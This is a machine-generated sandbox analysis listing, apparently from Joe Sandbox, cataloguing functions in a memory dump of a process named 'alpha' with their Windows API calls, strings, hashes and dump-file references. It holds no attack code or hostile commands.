                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                      • String ID: PE
                                                                                      • API String ID: 2941894976-4258593460
                                                                                      • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                      • Instruction ID: 25c92d2705f0dd580362b13103827649c9f2bc274b8bea242f0330990ce49844
                                                                                      • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                      • Instruction Fuzzy Hash: CB41A571608A8286F6F0AB21E490279F7A5FB8DB91F844134DE5D13B95DF3CE445CB22
                                                                                      Function 00007FF793750010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF79376849D,?,?,?,00007FF79376F0C7), ref: 00007FF793750045
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79376F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF793750071
                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793750092
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7937500A7
                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793750148
                                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793750181
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                      • String ID:
                                                                                      • API String ID: 734197835-0
                                                                                      • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                      • Instruction ID: 199d69c165c5c9dca4e53d2adc9eaa347c793ab30c8238378622747c866b68fc
                                                                                      • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                      • Instruction Fuzzy Hash: 5361C33290C69286F7B4AB35A880339FA99FB4EB45F848136DD4E63790DF3CA405C760
                                                                                      Function 00007FF793769B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$Openwcsrchr
                                                                                      • String ID: %s=%s$.$\Shell\Open\Command
                                                                                      • API String ID: 3402383852-1459555574
                                                                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                      • Instruction ID: 6a30e60a7de614da88fb3ce901adc460f22ce2881e0dca574eecd29b3e44fc9d
                                                                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                      • Instruction Fuzzy Hash: 74A1EA22A08A4182FBB0AB75D0A01B9E2AAEF4A794FC04535D94D277C5DF7CE901C721
                                                                                      Function 00007FF793757610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wcscmp
                                                                                      • String ID: %s
                                                                                      • API String ID: 243296809-3043279178
                                                                                      • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                      • Instruction ID: cd72678292252cf8e3237e4e053a9490476feb6dafcd6bdd26f155330e76e73b
                                                                                      • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                      • Instruction Fuzzy Hash: BAA18E227097C696FBB9EB31D8803F9A399EB4C748F90443ACA4D5B695DF3CE6458310
                                                                                      Function 00007FF793741F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$EnvironmentVariable
                                                                                      • String ID: DIRCMD
                                                                                      • API String ID: 1405722092-1465291664
                                                                                      • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                      • Instruction ID: 6c47cb72964862819b173c119f86f01769876ac60c0abc8c606b81f807bcdd8d
                                                                                      • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                      • Instruction Fuzzy Hash: 05815C72A08BC28AEB70DF30E8842ED77A9FB48748F504139DA8D67B58DF38E1558710
                                                                                      Function 00007FF7937499F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • wcschr.MSVCRT(?,?,?,00007FF7937499DD), ref: 00007FF793749A39
                                                                                        • Part of subcall function 00007FF79374DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF79374CEAA), ref: 00007FF79374DFB8
                                                                                        • Part of subcall function 00007FF79374DF60: RtlFreeHeap.NTDLL ref: 00007FF79374DFCC
                                                                                        • Part of subcall function 00007FF79374DF60: _setjmp.MSVCRT ref: 00007FF79374E03E
                                                                                      • wcschr.MSVCRT(?,?,?,00007FF7937499DD), ref: 00007FF793749AF0
                                                                                      • wcschr.MSVCRT(?,?,?,00007FF7937499DD), ref: 00007FF793749B0F
                                                                                        • Part of subcall function 00007FF7937496E8: memset.MSVCRT ref: 00007FF7937497B2
                                                                                        • Part of subcall function 00007FF7937496E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF793749880
                                                                                      • _wcsupr.MSVCRT ref: 00007FF79375B844
                                                                                      • wcscmp.MSVCRT ref: 00007FF79375B86D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                      • String ID: FOR$ IF
                                                                                      • API String ID: 3663254013-2924197646
                                                                                      • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                      • Instruction ID: 1e64c6cadafdff8e33b126b744d593b533debeece80f10416ee2bb1fd5f00ac9
                                                                                      • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                      • Instruction Fuzzy Hash: E451A220B0964281FEB8BB3694D4279A6DABF4DB90FC85636D91E277D1DE3CB401C360
                                                                                      Function 00007FF79374F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F0D6
                                                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F1BA
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F1E7
                                                                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F1FF
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F2BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: iswdigit$iswspacewcschr
                                                                                      • String ID: )$=,;
                                                                                      • API String ID: 1959970872-2167043656
                                                                                      • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                      • Instruction ID: 7eb312de1276f8643cd72cb47c90f3d85cd667fa2d3e274b73f345b1ad2c8887
                                                                                      • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                      • Instruction Fuzzy Hash: 31418C61E0825285FBF46B35A5C8379F6EAEF5D751FC45832CA8D622A0DF3CB4818721
                                                                                      Function 00007FF79376BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                      • String ID: %04X-%04X$:
                                                                                      • API String ID: 930873262-1938371929
                                                                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                      • Instruction ID: 4394bda53a9db24460405ee260c80b85cc34baa92838500d6694680f84134c28
                                                                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                      • Instruction Fuzzy Hash: A1417E21A08A42D2FBB4AB31E4902BAE2A8EB8D745FC04136D94E626D5DF3CE545C731
                                                                                      Function 00007FF7937536EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                      • API String ID: 3249344982-2616576482
                                                                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                      • Instruction ID: 5e68441ee6b38000b3bf6e4170fde28ccb5100a84c24370abaec5018c07da212
                                                                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                      • Instruction Fuzzy Hash: 45417471A18B4186F3A09F21A8C4375FAA8FB4DBD5F844635DA4E177A4CF3CD1148B60
                                                                                      Function 00007FF793756A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756A73
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756A91
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756AB0
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756AE3
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756B01
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$iswdigit
                                                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                                                      • API String ID: 2770779731-632268628
                                                                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                      • Instruction ID: cb75569182bc531550625099640aac7d6d9c080a047c7177362a0eb5fee8bddb
                                                                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                      • Instruction Fuzzy Hash: BF316E22A08B56C5EBA4AF21E4C0279B7E4FB8CF41B959036DA4E13394EF3CE400C720
                                                                                      Function 00007FF79376D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                      • String ID:
                                                                                      • API String ID: 3192234081-0
                                                                                      • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                      • Instruction ID: 0ff2e558aa32c9a2f44fb95e8a05f1cbb21c371eb831963e6b91deebce412738
                                                                                      • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                      • Instruction Fuzzy Hash: B931AF31708A418BF7A0AF31A48467DFBA5FB8DB85F849134DE8A57791CE3CE4018B10
                                                                                      Function 00007FF793751630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF793751673
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF79375168D
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF793751757
                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF79375176E
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF793751788
                                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF79375179C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Alloc$Size
                                                                                      • String ID:
                                                                                      • API String ID: 3586862581-0
                                                                                      • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                      • Instruction ID: d48250405503887afc0ad6b4c53db02baef136608bb2bacf61f7d52518a9126b
                                                                                      • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                      • Instruction Fuzzy Hash: 74917321A1964681FEB8AB29D4C0279F7A9FB4CB95F958536CE4D233A0DF3CE441C720
                                                                                      Function 00007FF7937586F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                      • String ID:
                                                                                      • API String ID: 1313749407-0
                                                                                      • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                      • Instruction ID: 1b03ade12f9dc9727ebc4b9c2f2b3a89f83707dde52982aef290603d06e24474
                                                                                      • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                      • Instruction Fuzzy Hash: 4451D621B0868293FAB8BB319494179E699FF4DBA0F885635DD1E277D0DF3CE8418660
                                                                                      Function 00007FF79376EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
